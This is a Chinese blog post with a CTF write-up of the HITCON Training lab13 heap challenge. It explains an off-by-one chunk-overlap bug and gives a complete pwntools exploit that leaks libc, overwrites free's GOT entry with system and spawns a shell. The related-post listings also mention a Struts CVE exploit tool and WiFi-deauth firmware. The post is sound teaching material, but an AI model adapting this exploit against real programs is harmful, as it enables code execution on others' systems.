【PWN · heap | Overlap | off-by-one】HITCON Trainging lab13

已于 2023-11-04 01:14:48 修改
阅读量206 收藏 1
点赞数
分类专栏: 【PWN · Heap】 文章标签: pwn ctf off-by-one overlap
于 2023-11-04 01:13:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/134213427
版权

记录一道wiki学习overlap的题目

前言

通过overlap可以造成堆的重叠,进而通过堆的修改、访问等操作,劫持或泄露另一个堆的信息,如果堆上存在指针,而存在对指针的读写,就可以控制修改该指针,进行任意地址读/写。

一、题目

二、思路

存在show和edit功能,且结构体上含有字符串指针,edit中存在off-by-one漏洞可造成overlap。正如我们所说的,可以造成任意地址读写。这里通过任意地址读来泄露libc地址,通过任意地址写来劫持free的got表为system。具体看exp,深夜,累了。

三、exp

from pwn import *

context(arch='amd64',log_level='debug')

io=process('./pwn')
elf=ELF('./pwn')
libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')

def create(size_heap,content):
    io.sendlineafter(b'Your choice :',b'1')
    io.sendlineafter(b'Size of Heap : ',str(size_heap).encode())
    io.sendlineafter(b'Content of heap:',content)
    io.recvuntil(b'SuccessFul')

def edit(index,content):
    io.sendlineafter(b'Your choice :',b'2')
    io.sendlineafter(b'Index :',str(index).encode())
    io.recvuntil(b'Content of heap : ')
    io.sendline(content)

def show(index):
    io.sendlineafter(b'Your choice :',b'3')
    io.sendlineafter(b'Index :',str(index).encode())
    io.recvuntil(b'Size : ')
    size=io.recvuntil(b'\n',drop=True)
    io.recvuntil(b'Content : ')
    content=io.recvuntil(b'\n',drop=True)
    return size,content
def delete(index):
    io.sendlineafter(b'Your choice :',b'4')
    io.sendlineafter(b'Index :',str(index).encode())

# 思路:libc通过指针show可以打印
# 通过extend将一个chunk包含在另一个chunk的conten域中
# 修改chunk的content指针指向free_got,且修改chunk头为'/bin/sh'
# 修改free_got的内容为system

# gdb.attach(io)
create(0x38,b'to write bin_sh and off_by_one')  
#之所以是0x_8的大小,是为了造成临近堆的prev_size域复用,堆1末与堆2size域相邻,为1字节的溢出作准备
create(0x10,b'tobeoff_by_one')
edit(0,b'/bin/sh\x00'+0x30*b'a'+b'\x41')
delete(1)
create(0x30,b'a'*0x20+p64(0x30)+p64(elf.got['free']))
sz,free_addr=show(1)
free_addr=u64(free_addr.ljust(8,b'\x00'))
success(hex(free_addr))
libc_base=free_addr-libc.sym['free']
system=libc_base+libc.sym['system']
edit(1,p64(system))
delete(0)
io.interactive()

Mr_Fmnwon
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
堆溢出 HITCON Trainging lab13
winterze的博客
04-14 247
chunk-extend学习,一个友好的题目,下载地址 0x00 程序分析 基本信息 [*] '/home/ububtu/ctf/pwn/heapcreator' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE:...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
HITCON Trainging lab13——CTFwiki
qq_53928256的博客
08-22 1066
通过off by one溢出修改next chunk的size域来实现overlap,修改指针实现执行system函数,获得系统权限
HITCON Trainging lab13——heapcreator
04-19 240
64位程序,没开PIE   #chunkoverlapping #off by one 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 char *v3; // rsi 4 const char *v4; // rdi 5 char...
buuctf hitcontraining_heapcreator HITCON Trainging lab13
weixin_45677731的博客
08-10 988
这一题在wiki上面是有的,在Chunk Extend and Overlapping里面,个人觉得这一题对于我这种刚开始学习堆的人来说,是比较容易理解的一题 拖进IDA create_heap函数: 值得注意的是,他这里是会有两次malloc的,也就是说,你申请了一次,他就会创建两个chunk,第一个chunk是0x20大小的,可以看作是记录的作用,里面存放着第二个chunk的size和指针,同时,第一个chunk的地址指针保存在bss段中,heaparray数组这里: 这样表述起来可能不太清晰,我申
Chunk Extend and Overlapping(HITCON Trainging lab13)
九层台
08-13 599
数据结构 unsigned __int64 create_heap() { _QWORD *v0; // rbx signed int i; // [rsp+4h] [rbp-2Ch] size_t size; // [rsp+8h] [rbp-28h] char buf; // [rsp+10h] [rbp-20h] unsigned __int64 v5; // [r...
PWN-PRACTICE-BUUCTF-17
P1umH0的博客
09-05 155
PWN-PRACTICE-BUUCTF-17hitcontraining_heapcreatorwustctf2020_closedciscn_2019_es_7hitcon2014_stkof hitcontraining_heapcreator 单字节溢出,修改下一个chunk的size,造成chunk overlap,实现任意地址读写 参考:buuctf hitcontraining_heapcreator HITCON Trainging lab13 # -*- coding:UTF-8 -*-
Chunk Extend/Overlapping | 堆拓展、重叠
SkYe's Blog
08-06 1584
堆拓展&溢出 绝大部分内容来自 CTF-WIKI ,内容引用用于学习记录 介绍 chunk extend 是堆漏洞的一种常见利用手法,通过 extend 可以实现 chunk overlapping 的效果。这种利用方法需要以下的时机和条件: 程序中存在基于堆的漏洞 漏洞可以控制 chunk header 中的数据 原理 chunk extend 技术能够产生的原因在于 ptmalloc 在对堆 chunk 进行操作时使用的各种宏。 在 ptmalloc 中,获取 chunk 块大小的操作如
Chunk Extend and Overlapping
Grxer的博客
03-20 106
这样我们的 *heap会申请到0x20的chunk,content会申请到0x40的chunk,我们的0x40chunk会overlap到0x20的chunk,从而控制其内容,我们把他的content指针改为got就,可以在show的时候输出地址。会在main()函数调用前执行,这样可以通过修该地址的指针来将控制流指向病毒或者寄生代码,因为比main执行还早,大部分恶意软件都是hook这个,感觉c++的构造函数或许和这个相关。这样我们就可以改写这个main的返回地址为one_gadget地址。
好好说话之Chunk Extend/Overlapping
hollk’s blog
09-04 4627
这是进入堆领域的第二个知识点,Chunk Extend/Overlapping。不知道正在看这篇文章的你有没有一些拓展的思想,在了解堆的基础知识后有没有自己想过在堆中可能存在问题的点。我们可能从做第一道pwn题开始就知道要溢出、要泄露、要拿flag、拿shell,在知道了这些技巧之后看到shell这道题就过去了,可能也没想过为什么会这样,往往这些我们不在乎的东西才是同比场景的方法和思路 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
Python库 | pwn-machine-1.1.tar.gz
03-11
python库。 资源全名:pwn-machine-1.1.tar.gz
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
pyzmq-23.1.0-cp310-cp310-musllinux_1_1_x86_64.whl
06-07
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
MAVEN 教程和详细讲解
06-07
MAVEN 教程和讲解
人工智能基础知识背诵(大学生期末)
06-07
人工智能基础知识背诵(大学生期末)
pyzmq-25.1.0-cp37-cp37m-musllinux_1_1_x86_64.whl
最新发布
06-07
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
08-17
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA是用来表示不同内存区块的缩写标记。其中,STACK代表栈空间,HEAP代表堆空间,CODE代表代码段,DATA代表数据段,RWX代表可读、可写、可执行的空间,RODATA代表...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值